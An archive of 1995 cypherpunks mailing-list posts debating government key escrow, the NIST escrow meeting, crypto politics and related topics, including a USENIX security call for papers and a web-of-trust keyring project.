> >share with our computers.
> 
> Poor you, the only major political party to come out with a pro crypto statement 
> is a socialist party.

I think the libertarian position is inherently pro-crypto.
Besides, the French are socialist, and well, as far as crypto goes...

> 
> The problem is currently with the right wing, right wing democrats such as 
> Clinton and practically all the Republicans. 
> 

Whatever. Clinton proposed crypto, some democrat wrote the electronic
decency act. (In fact Gingrich was against it)

> If you want a debate on how to convince the authoritarians then perhaps you will 
> get some interest. Trying to make crypto control out to be a left/right or 
> pro/anti gun control issue is no more relevant than the pro/anti abortion 
> debate.

I think that to some extent it is very relavant to gun control in that
both can be abused and that both help the law-abiding citizen do things.

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+---- Random Thought ------------------------------------------------------+
|I conducted an experiment to test Murphy's Law, but everything went wrong.|
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 7 Sep 95 19:12:32 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950907060030.15660D-100000@panix.com>
Message-ID: <Pine.SUN.3.91.950907221236.5719A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 7 Sep 1995, Duncan Frissell wrote:

> 
> 
> On Wed, 6 Sep 1995, Buford Terrell wrote:
> 
> > How could crypto put lawyers out of business?  People would still
> > have disagreements; plans would still go wrong; cars would still
> > crash.  More important, transactions would still need to be 
> > structured to carry out the desires of the parties while minimizing
> > risks.
> > 
> > Good communications technology, including crypto, could make lawyering
> > more efficient, but I suspect the savings would be minimal.
> 
> Well, if crypto reduces the role of government in human affairs, it will 
> reduce work for lawyers.

This first, I see....


Telecoms will certainly break the professional 
> monopoly of lawyers (and other professionals).

This I don't.  How do you mean exactly?

> 
> DCF
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 7 Sep 95 19:17:10 PDT
To: cypherpunks@toad.com
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.BSD.3.91.950907180215.790B-100000@usr2.primenet.com>
Message-ID: <9509080216.AA07325@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Nope.  but the patriots & the cyPHerpunks share a common goal, and belief 
>that it is none of the government's business what we think or want to 
>share with our computers.

Poor you, the only major political party to come out with a pro crypto statement 
is a socialist party.

The problem is currently with the right wing, right wing democrats such as 
Clinton and practically all the Republicans. 

Crypto is outsi]de the left right debate which centers on ecconomic goals, 
whether to help the poor or the rich. The crypto debate is on the 
authoritarian/libertarian axis which is orthogonal. Geroge Orwell was a 
socialist, John Stuart Mill a Liberal, both had very anti-authoritarian views 
which used to be known as libertarian. 

If you want a debate on how to convince the authoritarians then perhaps you will 
get some interest. Trying to make crypto control out to be a left/right or 
pro/anti gun control issue is no more relevant than the pro/anti abortion 
debate.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 7 Sep 95 18:49:37 PDT
To: ghio@c2.org (Matthew Ghio)
Subject: Re: Commercial Speech over Internet product
In-Reply-To: <m0sqray-0012qWC@myriad>
Message-ID: <m0sqt2k-0009yvC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> >        Here's an article about a commercial company that is doing speech
> >over the Internet.  Maybe someone would like to help them add encryption.
> >                --Bob Baldwin, speaking for myself only.
> 
> The program is a sound-listening extention for web-browsers.  There is
> really no use for crypto because it's only processing information which
> is already public.


That's not necessarily true:

I could setup a web server to only listen to a socket that a local ssh
socket proxy could connect to.  Restrict the ssh session for a particular
key to only allow connection to that one socket.  Then the connecting
party would need ssh running with socket proxy near(er) their client
system and the public key.

Assuming that you have a Unix workstation with audio listening software
or a nearby PC it would be easy to setup.

Internet/Web accessible RSA protected, session encrypted voice mail.

Now if someone would just port ssh to the PC as a selective Winsock
wedge...

(I'd love an example of Winsock wedge code (A la Surfwatch)!!!)
I have a neighbor that develops one of the commercial TCP/IP stacks, so
it's quite possible I could convince him to help.

With things like ssh, it's already very easy to create secure tunnels.

It wouldn't be too tough to modify a proxy to use ssh style connections
if an initial connection was found to be encrypted (or a key was cached
for a URL).

Of course, IPsec is coming...

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 7 Sep 95 19:52:19 PDT
To: cypherpunks@toad.com
Subject: RE: Key Escrow Papers
Message-ID: <81288.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  John Young <jya@pipeline.com>  writes:

> Perhaps someone, Pat Farrell or another, would be willing
> to make them available on a homepage or ftp site. If so we
> will send them over.

I will gladly put up any nist-meeting papers, comments, drafts, etc.
on my webpage. Please send them to me. (pfarrell@netcom.com)

I am even willing to type in some, but that is known to cause typos,
as I can't type, and even spellcheckers can't tell real words
such as 'sham' from 'shame'

Right now, I'm pretty down on the two days, but lets keep the information
flowing.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 20:40:09 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950907221236.5719A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.950907233749.7150A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 7 Sep 1995, Black Unicorn wrote:

> Telecoms will certainly break the professional 
> > monopoly of lawyers (and other professionals).
> 
> This I don't.  How do you mean exactly?

Licensing requires the ability to outlaw unlicensed transactions.  
Since the Net trumps censorship and allows consultations at a 
distance, it cracks licensing,

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Terrell@sam.neosoft.com)
Date: Wed, 20 Sep 95 17:27:56 PDT
To: cypherpunks@toad.com
Subject: RE: GAK
Message-ID: <9509201549166094@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 07 Sep 1995 18:42:06 -0500
To: cypherpunks@toad.com
From: terrell@sam.neosoft.com (Buford Terrell)
Subject: Re: GAK

>Date: Sun, 3 Sep 1995 21:25:26 -0400 (EDT)
>From: Brian Davis <bdavis@thepoint.net>

>Subject: Re: GAK

>On Fri, 1 Sep 1995, Timothy C. May wrote:
>
>> At 10:56 PM 9/1/95, Buford Terrell wrote:
>> 
>> >If you've ever watched Not_at_all_Funny Home Videos or any of the
>> >American Urinal school of tabloid television, you soon start feeling
>> >that the real threat to privacy is not the guvmint, but all of
>> >the yoyos with their little cam corders running around pointing them
>> >at people.
>> >
>> >Security cameras in ATMS and at airline ticket counters do more
>> >to threaten you privacy than do FIBBIE wiretaps, and PGP won't
>> >protect you from them. (and usually neither will the courts).
>> 
>> I absolutely agree with this, though this doesn't mean I'll stop worrying
>> about the government's plans for key escrow (GAK), about limits on key
>> lengths, or about other efforts to thwart strong security.
>
>I, of course, know of the "dislike" of GAK here.  I am curious to know, 
>however, if the "dislike" is because government would have access under 
>any circumstances or if the primary worry is that government will cheat 
>and get access when most would agree that they shouldn't (either by the 
>judge "cheating" or a TLA stealing it).
>
>In other words ... if it took agreement by a review board composed of 
>non-LEA members of this list, would the escrow be acceptable??
>
>EBD
>
In my case, it's simply a matter of principle: the government has no
right to know what I'm saying.  Search warrants may allow them to
get to "things" that I have, but the First and Fifth amendments make
words sacred.  If the government can eavesdrop on my conversation,
then my speech is no longer free.

A review board consisting of cypherpunks has no more right to listen
to my private conversations than does the FBI, so I would not agree
to that proposal either.

  --buford





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 00:00:48 PDT
To: trei@process.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <199509080700.AAA23137@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 AM 9/7/95 -6, Peter Trei wrote:
>"If keys are escrowed, what purpose does a 64 bit limit serve?"
A 64 bit limit serves lots of purposes, like letting the NSA crack stuff;
I suspect escrow is being used as an excuse to get big vendors to
standardize on wimpy 64-bit crypto as much as anything else.


>Secondarily, I observe that this apparently precludes the use of OTP.

Not to the devious (though the devious may not be able to get export approval)
After all, you could escrow a _lot_ of 32-bit OTPs :-)

(yeah, I know, the requirement that you identify which escrowed key is being
used makes that less than useful, unless the final standard comes out with
clear, unambiguous language which fails to cover all cases and can
therefore be abused - that's one problem with the current "ask the NSA" rule.)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Thu, 7 Sep 95 21:06:29 PDT
To: cypherpunks@toad.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <199509080406.AAA25183@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


>I hope this gets to you before the conference is over. I would REALLY
>like to hear the government response to the question:

>"If keys are escrowed, what purpose does a 64 bit limit serve?"

I thought that Bruce Schneier (sp?) had a good point at DefCon:
(something like:) "The US Government thinks that there is a type
of criminal smart enough to use encryption and dumb enough to 
use encryption provided by the US Government..."(lots of applause).

I think that is a good point.  Of course, if all non-escrowed
encryption techniques were made illegal, then the criminals would
just have another broken law under their belt if they used
strong encryption.  After all, an outlaw is an outlaw because
he has broken laws, so what sense does it make to make more
laws for him to break?  Hmph.  

Also, semi unrelated: How do the copyright, pornography, and
California Penal Code 502.7 laws fit in with the first
ammendment?

[Please send a cc: of any replies to dr261@cleveland.freenet.edu
because I am no longer on cypherpunks )-:  I can't handle the
mail volume any longer now that I have homework to do.. <g>]

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Fri, 8 Sep 95 00:10:47 PDT
To: Patrick Horgan <patrick@Verity.COM>
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <9509071507.AA08037@cantina.verity.com>
Message-ID: <Pine.BSD.3.91.950908000635.8478A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Patrick Horgan wrote:

> I know who you're referring to by saying co$, but what do co$ mean?
> Co-DollarSign?  Co-Dollar?
> 

Church of $cientology  [the $ replacing the S because their true goal is 
profit, not help]


||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Thu, 7 Sep 95 23:35:23 PDT
To: don@cs.byu.edu
Subject: Re: Announce: Web of Trust Ring
In-Reply-To: <199509071832.MAA00480@wero.byu.edu>
Message-ID: <199509080635.AAA01087@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> WEB OF TRUST KEYRING GENERATION PROJECT
> 
> I have completed my project to make a condensed version of the keyserver
> PGP keyrings, containing only the "web of trust" inter-related keys. My
> methods were rather crude, and unfortunately only extracted those people
> who have signed someone (already on the list) else's key. That means that
> people who are well connected on the web of trust are included, while
> those people who only receive signatures from well-connected people are
> not included.


A very interesting project!  Can you give us some data like how many is the
maximum number of hops necessary to connect two people on the WoT?  (I am
aware that one wouldn't want to trust such a connection, and that PGP doesn't
actually allow you to do so for hops > 2...)


(P.S.  I guess "12" based on the number of passes necessary.  That seems like
a really high number to me...)


Are any obvious pseudonyms in?  (I would guess not.)


I wonder what sorts of statistical analyses could be done on this WoT?  Is it
fairly evenly spread out or are the noticeably larger "clumps" of mutual
signatures?  How many keys *are* there in this (subset of the) WoT?


Here's a question:  for two randomly selected members of your WoT, how many
signatures would a Man In The Middle have to fake in order to isolate the one
member from the other?


Thanks for this, Don.


Bryce

signatures follow:


                                    +                                           
      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Bryce's Auto-PGP v1.0beta3

iQCVAwUBME/kDPWZSllhfG25AQHGFAQApDoogEs7Dv8+ncQYAR7NUStvL2acs9x3
j5aEeF/GpA6kKZD/Rw6FO5vqCXol/fJ0oGgwgTBPzJAF2ZfUQ6P1KQJweAebDuNs
2JlBjEkTpaDgQ6PwPFwzEr02nP06wE0mF5ssdDvd2LcIbVdDY2XB7jyXh4+AC1fP
+lRujkScF0M=
=/ef6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 7 Sep 95 21:38:16 PDT
To: cypherpunks@toad.com
Subject: Usenix symposium on crypto applications
Message-ID: <9509080437.AA08201@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Newsgroups: comp.org.usenix,comp.org.uniforum,comp.org.sug,comp.unix.admin,comp.unix.large,comp.org.decus,comp.security.unix
Path: paperboy.osf.org!bone.think.com!blanket.mitre.org!agate!spool.mu.edu!howland.reston.ans.net!tank.news.pipex.net!pipex!in2.uu.net!usenix!toni
>From: toni@usenix.org (Toni Veglia)
Subject: 6th USENIX UNIX Security Symposium - Call-for-Papers
Message-ID: <DEI0Mp.4L7@usenix.org>
Reply-To: toni@usenix.org (Toni Veglia)
Organization: USENIX Association, Berkeley, CA
Date: Wed, 6 Sep 1995 19:25:37 GMT
Lines: 218
Xref: paperboy.osf.org comp.org.usenix:3623 comp.org.uniforum:20 comp.org.sug:940 comp.unix.admin:33851 comp.unix.large:1699 comp.org.decus:6147 comp.security.unix:19702


      Announcement and Preliminary Call for Papers

	   6th USENIX UNIX Security Symposium
	Focusing on Applications of Cryptography
		     July 22-25, 1996
		      Fairmont Hotel
		   San Jose, California


Sponsored by the USENIX Association, the UNIX and
Advanced Computing Systems Professional and
Technical Association

Co-sponsored by UniForum (pending)
In cooperation with: The Computer Emergency
Response Team (CERT), and IFIP WG 11.4

Important Dates

Dates for Refereed Paper Submissions 
Extended abstracts due:                 Mar 19, 1996 
Program Committee decisions made:       Apr 15, 1996
Camera-ready final papers due:          June 10, 1996

Registration Materials Available:  End April 1996

Program Committee
Program Chair:  Greg Rose, Sterling Software.

Fred Avolio, Trusted Information Systems, Inc.
Steve Bellovin, AT&T Bell Laboratories
Brent Chapman, Great Circle Associates
Diane Coe, Mitre
Ed DeHart, CERT
Dan Geer, Open Market Inc.
Peter Gutmann, University of Auckland
Kent Landfield, Sterling Software
Clifford Neuman, Information Sciences Institute
Avi Rubin, Bellcore
Eugene Spafford, COAST Laboratory, Purdue University
Ken van Wyk, Defense Information Systems Agency
Karen Worstell, The Boeing Company

Readers: Matt Bishop, U.C. Davis; Phil Karn, Qualcomm

Overview

The goal of this symposium is to bring together
security and cryptography practitioners,
researchers, system administrators, systems
programmers, and others with an interest in
applying cryptography, network and computer
security, and especially the area where these
overlap. The focus on applications of
cryptography is intended to attract papers in the
fields of electronic commerce and information
processing, as well as security. Please note that
papers about new cryptographic algorithms are not
solicited; however new applications are.

This will be a four day single track symposium
with tutorials, refereed and technical
presentations, and panel discussions.  Tutorials
will take place the first two days followed by
two days of technical sessions.

Tutorials
July 22-23

Tutorials for both technical staff and managers
will provide immediately useful, practical
information on topics such as local and network
security precautions, what cryptography can and
cannot do, security mechanisms and policies,
firewalls and monitoring systems.

Technical Sessions
July 24-25

In addition to the keynote presentation, the
technical program includes refereed papers and
invited talks. There may be panel sessions.
There will be Birds-of-a-Feather sessions and
Works-in- Progress Reports on two evenings. You
are invited to make suggestions to the program
committee via email <security@usenix.org>.

Papers that have been formally reviewed and
accepted will be presented during the symposium
and published in the symposium proceedings.
Proceedings of the symposium will be published by
USENIX and will be provided free to technical
session attendees; additional copies will be
available for purchase from USENIX.

Symposium Topics 

Presentations are being solicited in areas
including but not limited to: 

	*Anonymous transactions
	*Applications of cryptographic techniques
	*Attacks against secure networks/machines
	*Cryptanalysis and codebreaking as attacks
	*Cryptographic tools
	*Electronic commerce security
	*Firewalls and firewall toolkits
	*Legislative and legal issues
        *Case studies
        *Computer misuse and anomaly detection
        *File and File system security
        *Network security 
        *Security and system management 
        *Security in heterogeneous environments
        *Security incident investigation and response
        *Security tools 
        *User/system authentication
	*Penetration testing
	*Malicious code analysis

Note that this symposium is not about new codes
or ciphers, or cryptanalysis for its own sake.

How to Submit a Refereed Paper

Submissions must be received by Mar 19, 1996.
Authors are encouraged to submit an extended
abstract which discusses key ideas and
demonstrates the structure of the finished
paper.  Extended abstracts should be 3-5 pages
long (about 1500-2500 words), not counting
references and figures.  The body of the extended
abstract should be in complete paragraphs.  The
object of an extended abstract is to convince the
reviewers that a good paper and presentation will
result.  Full papers can be submitted if they are
complete in advance of the date.  Full papers
should be 8 to 15 typeset pages.

Authors will be notified of acceptance on April
15, 1996.

All submissions will be judged on originality,
relevance, and correctness.  Each accepted
submission will be assigned a member of the
program committee to act as its shepherd through
the preparation of the final paper.  The assigned
member will act as a conduit for feedback from
the committee to the authors.  Camera-ready final
papers are due June 10, 1996.

Please accompany each submission by a cover
letter stating the paper title and authors along
with the name of the person who will act as the
contact to the program committee.  Please include
a surface mail address, daytime and evening phone
number, and, if available, an email address and
fax number for the contact person.

If you would like to receive detailed guidelines
for submission and examples of extended
abstracts, you may send email to:

	securityauthors@usenix.org

or telephone the USENIX Association office at
+1 510 528 8649.

The UNIX Security Symposium, like most
conferences and journals, requires that papers
not be submitted simultaneously to another
conference or publication and that submitted
papers not be previously or subsequently
published elsewhere.  Papers accompanied by
"non-disclosure  agreement" forms are not
acceptable and will be returned to the author(s)
unread.  All submissions are held in the highest
confidentiality prior to publication in the
Proceedings, both as a matter of policy and in
accord with the U.S. Copyright Act of 1976.

Where To Submit

Please send one copy of an extended abstract or a
full paper to the program committee via each of
two, for reliability, of the following methods.
All submissions will be acknowledged.

  o Preferred Method: email (Postscript or ASCII) to:
        securitypapers@usenix.org

  o Alternate Method: postal delivery to
       Security Symposium
       USENIX
       2560 Ninth St., Ste. #215
       Berkeley CA 94710
       U.S.A.
       Phone: +1 510 528 8649

  o Fax: +1 510 548 5738

Registration Materials

Materials containing all details of the technical and tutorial
programs, registration fees and forms, and hotel information
will be available at the end of April 1996.  If you wish to
receive the registration materials, please contact USENIX at:

             USENIX Conference Office
             22672 Lambert Street, Suite 613
             Lake Forest, CA USA   92630
             +1 714 588 8649; Fax: +1 714 588 9706
             email: conference@usenix.org

Information can also be found under the USENIX Association
WWW page URL:  http://www.usenix.org
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 7 Sep 95 22:00:47 PDT
To: Yih-Chun Hu <yihchun@u.washington.edu>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.OSF.3.91j.950907213051.24322B-100000@saul3.u.washington.edu>
Message-ID: <Pine.D-G.3.91.950908010627.4194D-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Yih-Chun Hu wrote:

> On Thu, 7 Sep 1995 hallam@w3.org wrote:
> 
> Whatever. Clinton proposed crypto, some democrat wrote the electronic
            ^^^^^^^^^^^^^^^^^^^^^^^
Sorry.  Clipper precedes Clinton.    



> decency act. (In fact Gingrich was against it)


EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Thu, 7 Sep 95 22:46:38 PDT
To: cypherpunks@toad.com
Subject: Magazine / Goodbye
Message-ID: <199509080546.BAA27342@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello, everyone.. <warning: semi off-topic post> I am posting
this to let everyone know that I am starting a semitechnical
magazine titled _The_Carrier_Wave_.  It will be published every
two months to begin with, and hopefully monthly if I receive
enough material.  I am requesting articles, columns, news, 
bits, etc..  Whenever anything -interesting- happens, I'd
appreciate it if someone could write a long or short blurb
about it and forward it to me.  Events, meetings, tradeshows,
milestones, new algorithms...  Stories about PGP, Clipper,
etc... Use this to get the word out.  If someone could
run a "Cryptography Column" or "CryptoNews" or a Cypherpunks
column, that would be great... If you are interested, please
send me mail at dr261@cleveland.freenet.edu..  Also note, I
have unsubscribed to Cypherpunks because I will be very
busy lately and an overflowing mailbox is undesirable.
Thanks!
!!!

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 8 Sep 95 02:10:18 PDT
To: cypherpunks@toad.com
Subject: Key Escrow Papers via FTP
Message-ID: <199509080910.CAA04960@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


The papers on Key Escrow scanned by John Young are available for FTP from:

ftp://ftp.teleport.com/pub/users/alano/nist.zip

They have been seperated into seperate text files (7 in all).

I will have an HTML version available from my web page soon.  (I am in the
process of converting the text to something HTMLlike.)

Comments/flames/etc can be sent my way, to John Young (jya@pipeline.com)
and/or to /dev/null (davenull@netscape.com).

Enjoy!
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 7 Sep 95 23:31:04 PDT
To: Yih-Chun Hu <yihchun@u.washington.edu>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.OSF.3.91j.950907213051.24322B-100000@saul3.u.washington.edu>
Message-ID: <Pine.SUN.3.91.950908022449.14802D-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Yih-Chun Hu wrote:

> > The problem is currently with the right wing, right wing democrats such as 
> > Clinton and practically all the Republicans. 
> > 
> 
> Whatever. Clinton proposed crypto, some democrat wrote the electronic
> decency act. (In fact Gingrich was against it)

Well, Gingrich SAID he was against it.  But he hedged even on that, and 
he certainly didn't DO anything about his opposition to it, unlike his 
actions with regard to things he truly supports.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 8 Sep 95 00:12:11 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why Key Escrow (GAK) is So Bad
Message-ID: <v02130509ac757ea3c107@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:22 9/7/95, Timothy C. May wrote:
>(Ironically, I just heard about a case in Texas where a judge ordered a
>mother to stop speaking in Spanish to her child at home, calling it "child
>abuse." The implications of this are self-evident.)

You have the facts slightly wrong. The order was no to stop talking Spanish
and to use English but only to Not use Spanish EXCLUSIVELY but to also use
English (so as to allow the Child to Grow up in a Bilingual Environment).
Waiting until the child was old enough to go to school would put the Child
at a disadvantage in learning English since the window of Chance for
Language Skill Pickup would have closed.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Fri, 8 Sep 95 03:33:25 PDT
To: pfarrell@netcom.com
Subject: NIST notes available
Message-ID: <199509081030.DAA06056@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to John Young, I have placed the test of the handouts
from Wedensday's and Thursday's meetings on my Nist pages.
url: http://www.isse.gmu.edu/~pfarrell/nistmeeting.html

It is my belief that this meeting was a staged presentation. 
Nearly every industry representative
said that this was a fatally flawed idea. It was 
"a non-starter." The government representatives
said that they heard the comments, but insisted on proceeding. 

The most depressing presentation was Thursday morning, made
by a high level Dept of Justice flack. I'll have to dig out my
notes, his name was Geoff G...
He presented the usual drug dealer, pedophile and terrorist line,
and added corrupt government officials. He pretended to talk about
foriegn bad guys. Nearly all were domestic. He clearly wants
weak GAK so that he can decrypt anything domestically that
he wants.

It is clear to me that the government intends that industry 
provide crippled encryption "for export"
with the never stated expectation that since industry has 
repeatedly said that they want only one
version of products, capable of being sold worldwide, 
that Domestic products will be crippled. 

It is equally clear from representatives of IBM, Compaq, DEC, 
Lotus, and others that I talked to, that crypto product 
development will simply move offshore. Ireland, Israel, 
and Germany already have significant experience in 
developing commercial software. 

It is depressing to hear our Commerce department chasing technology 
and jobs overseas.

GAK is bad enough. Weak GAK makes me gag.

Pat
 
Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Fri, 8 Sep 95 02:06:18 PDT
To: cypherpunks@toad.com
Subject: Re: Why Key Escrow (GAK) is So Bad
Message-ID: <v01510106ac75c4787549@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>At 10:22 9/7/95, Timothy C. May wrote:
>>(Ironically, I just heard about a case in Texas where a judge ordered a
>>mother to stop speaking in Spanish to her child at home, calling it "child
>>abuse." The implications of this are self-evident.)
>
>You have the facts slightly wrong. The order was no to stop talking Spanish
>and to use English but only to Not use Spanish EXCLUSIVELY but to also use
>English (so as to allow the Child to Grow up in a Bilingual Environment).
>Waiting until the child was old enough to go to school would put the Child
>at a disadvantage in learning English since the window of Chance for
>Language Skill Pickup would have closed.

(drifting wildly off topic...)

Consider me exhibit A that speaking only German in the home until age 17
does not diminish ones language skills. In fact, (drifting...) it was only
until I began speaking English to the exclusion of German that my language
skills began to decline.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMFAVMnIf3YegbdiBAQGHEQJWLnmpNDvyxYnj92AB+nQXcR3ys0TorYVQ
EoIAJAi+hyARme8291R7Ky6PeCdGNXOlEVpdVchh2MO/rpgI/Zn1OwjaPMpFrFZd
1ph7
=M/sp
-----END PGP SIGNATURE-----

Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    |        PGP Public Key              /goedel/key.txt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joelm@eskimo.com)
Date: Wed, 20 Sep 95 17:17:59 PDT
To: cypherpunks@toad.com
Subject: NIST ESCROW PAPERS - NOW WEB AVAILABLE
